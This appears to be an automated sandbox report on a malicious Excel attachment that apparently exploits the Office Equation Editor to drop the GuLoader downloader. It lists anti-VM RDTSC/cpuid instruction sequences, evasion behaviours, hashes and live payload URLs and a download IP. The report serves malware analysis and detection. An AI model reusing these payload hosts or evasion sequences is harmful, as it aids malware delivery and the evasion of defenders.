Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E2793	6_2_003E2793

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E01BE second address: 00000000003E01BE instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E70C1 second address: 00000000003E70D5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add edx, ecx 0x0000000c neg ecx 0x0000000e pushad 0x0000000f mov edx, 000000D8h 0x00000014 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E8DB2 second address: 00000000003E8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c test dl, dl 0x0000000e add eax, 00003004h 0x00000013 mov dword ptr [edi+00003000h], eax 0x00000019 test eax, eax 0x0000001b mov ecx, 07CEBD8Ah 0x00000020 cmp ax, 0000BB7Bh 0x00000024 sub ecx, 04255BC2h 0x0000002a xor ecx, 17A2670Fh 0x00000030 cmp al, bl 0x00000032 sub ecx, 140B05FBh 0x00000038 test eax, ebx 0x0000003a test edx, ebx 0x0000003c mov byte ptr [eax+ecx], 00000000h 0x00000040 dec ecx 0x00000041 mov dword ptr [ebp+0000025Ch], edi 0x00000047 mov edi, 4BBAF831h 0x0000004c pushad 0x0000004d rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E8DFF second address: 00000000003E8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test dl, dl 0x0000000c xor edi, 940AC00Fh 0x00000012 test eax, eax 0x00000014 xor edi, A987D7D4h 0x0000001a cmp ax, 0000BFCEh 0x0000001e sub edi, 7637EFEAh 0x00000024 cmp al, bl 0x00000026 cmp ecx, edi 0x00000028 mov edi, dword ptr [ebp+0000025Ch] 0x0000002e jnl 00007F50BC89D70Fh 0x00000030 test edx, ebx 0x00000032 mov byte ptr [eax+ecx], 00000000h 0x00000036 dec ecx 0x00000037 mov dword ptr [ebp+0000025Ch], edi 0x0000003d mov edi, 4BBAF831h 0x00000042 pushad 0x00000043 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E7A0D second address: 00000000003E7A0D instructions:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E01BE second address: 00000000003E01BE instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E70C1 second address: 00000000003E70D5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add edx, ecx 0x0000000c neg ecx 0x0000000e pushad 0x0000000f mov edx, 000000D8h 0x00000014 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E8DB2 second address: 00000000003E8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c test dl, dl 0x0000000e add eax, 00003004h 0x00000013 mov dword ptr [edi+00003000h], eax 0x00000019 test eax, eax 0x0000001b mov ecx, 07CEBD8Ah 0x00000020 cmp ax, 0000BB7Bh 0x00000024 sub ecx, 04255BC2h 0x0000002a xor ecx, 17A2670Fh 0x00000030 cmp al, bl 0x00000032 sub ecx, 140B05FBh 0x00000038 test eax, ebx 0x0000003a test edx, ebx 0x0000003c mov byte ptr [eax+ecx], 00000000h 0x00000040 dec ecx 0x00000041 mov dword ptr [ebp+0000025Ch], edi 0x00000047 mov edi, 4BBAF831h 0x0000004c pushad 0x0000004d rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E8DFF second address: 00000000003E8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test dl, dl 0x0000000c xor edi, 940AC00Fh 0x00000012 test eax, eax 0x00000014 xor edi, A987D7D4h 0x0000001a cmp ax, 0000BFCEh 0x0000001e sub edi, 7637EFEAh 0x00000024 cmp al, bl 0x00000026 cmp ecx, edi 0x00000028 mov edi, dword ptr [ebp+0000025Ch] 0x0000002e jnl 00007F50BC89D70Fh 0x00000030 test edx, ebx 0x00000032 mov byte ptr [eax+ecx], 00000000h 0x00000036 dec ecx 0x00000037 mov dword ptr [ebp+0000025Ch], edi 0x0000003d mov edi, 4BBAF831h 0x00000042 pushad 0x00000043 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E7A0D second address: 00000000003E7A0D instructions:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003E54E7 rdtsc

6_2_003E54E7

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 740	Thread sleep time: -240000s >= -30000s			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 740	Thread sleep time: -60000s >= -30000s			Jump to behavior

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003E54E7 rdtsc

6_2_003E54E7

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E50CA mov eax, dword ptr fs:[00000030h]	6_2_003E50CA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E2958 mov eax, dword ptr fs:[00000030h]	6_2_003E2958
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E71A9 mov eax, dword ptr fs:[00000030h]	6_2_003E71A9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E6B93 mov eax, dword ptr fs:[00000030h]	6_2_003E6B93
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E341B mov eax, dword ptr fs:[00000030h]	6_2_003E341B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E7D52 mov eax, dword ptr fs:[00000030h]	6_2_003E7D52

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000006.00000002.2360338564.0000000000A50000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000006.00000002.2360338564.0000000000A50000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.2360338564.0000000000A50000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003E2183 cpuid

6_2_003E2183

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
180.214.239.39	unknown	Viet Nam		135905	VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ceattire.com/bin_UYDMbHwI28.bin	true	Avira URL Cloud: safe	unknown
http://180.214.239.39/cpu/.svchost.exe	true	Avira URL Cloud: safe	unknown

AV Detection:

Found malware configuration

Source: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://ceattire.com/bin_UYDMbHwI28.bin"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	Virustotal: Detection: 42%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	ReversingLabs: Detection: 31%
Source: C:\Users\Public\vbc.exe	Virustotal: Detection: 42%	Perma Link
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 31%

Multi AV Scanner detection for submitted file

Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx

ReversingLabs: Detection: 28%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: .svchost[1].exe.4.dr

Software Vulnerabilities:

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 71MB

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://ceattire.com/bin_UYDMbHwI28.bin

Downloads executable code via HTTP

Source: global traffic

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\300F3110.emf

Jump to behavior

Source: global traffic

Source: .svchost[1].exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: 300F3110.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: .svchost[1].exe.4.dr	String found in binary or memory: https://www.digicert.com/CPS0

System Summary:

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe			Jump to dropped file

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E54E7 NtAllocateVirtualMemory,		6_2_003E54E7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E55AC NtAllocateVirtualMemory,		6_2_003E55AC

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E54E7	6_2_003E54E7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E7036	6_2_003E7036
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E100E	6_2_003E100E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E4071	6_2_003E4071
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E80D4	6_2_003E80D4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E2958	6_2_003E2958
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E2940	6_2_003E2940
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E29B0	6_2_003E29B0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E2183	6_2_003E2183
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E42CD	6_2_003E42CD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E72C3	6_2_003E72C3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E1B2D	6_2_003E1B2D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E1B1A	6_2_003E1B1A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E7B73	6_2_003E7B73
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E1B5F	6_2_003E1B5F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E4B8E	6_2_003E4B8E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E8385	6_2_003E8385
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E43F1	6_2_003E43F1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E341B	6_2_003E341B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E844C	6_2_003E844C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E8C82	6_2_003E8C82
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E8CD5	6_2_003E8CD5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E34C4	6_2_003E34C4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E350F	6_2_003E350F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E8D58	6_2_003E8D58
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E7D52	6_2_003E7D52
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E0EFE	6_2_003E0EFE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E3F0C	6_2_003E3F0C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E7F03	6_2_003E7F03
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E7F6D	6_2_003E7F6D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E0FB5	6_2_003E0FB5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E2793	6_2_003E2793
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E4785	6_2_003E4785

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A
Source: Joe Sandbox View	Dropped File: C:\Users\Public\vbc.exe FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A

PE file contains strange resources

Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/11@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$MTIR21487610_0062180102_20210714081247.PDF.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE205.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx

ReversingLabs: Detection: 28%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx

Static file information: File size 1268792 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: .svchost[1].exe.4.dr

Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx

Initial sample: OLE indicators vbamacros = False

Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, type: MEMORY

Yara detected GuLoader

Source: Yara match	File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000000.2144558034.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2360258562.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\Public\vbc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe, type: DROPPED

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040495E push es; ret	6_2_00404963
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221774 push edx; ret	6_2_002217A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221023 push edx; ret	6_2_00221051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00222823 push edx; ret	6_2_00222851
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224023 push edx; ret	6_2_00224051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00227024 push edx; ret	6_2_00227051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00225825 push edx; ret	6_2_00225851
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224833 push edx; ret	6_2_00224861
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223033 push edx; ret	6_2_00223061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221833 push edx; ret	6_2_00221861
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226034 push edx; ret	6_2_00226061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220038 push edx; ret	6_2_00220061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224803 push edx; ret	6_2_00224831
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223003 push edx; ret	6_2_00223031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221803 push edx; ret	6_2_00221831
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226004 push edx; ret	6_2_00226031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220008 push edx; ret	6_2_00220031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223813 push edx; ret	6_2_00223841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00225013 push edx; ret	6_2_00225041
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00222014 push edx; ret	6_2_00222041
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226814 push edx; ret	6_2_00226841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220818 push edx; ret	6_2_00220841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223063 push edx; ret	6_2_00223091
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221863 push edx; ret	6_2_00221891
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224863 push edx; ret	6_2_00224891
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226065 push edx; ret	6_2_00226091
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220068 push edx; ret	6_2_00220091
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00222074 push edx; ret	6_2_002220A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223874 push edx; ret	6_2_002238A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00225074 push edx; ret	6_2_002250A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226875 push edx; ret	6_2_002268A1

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
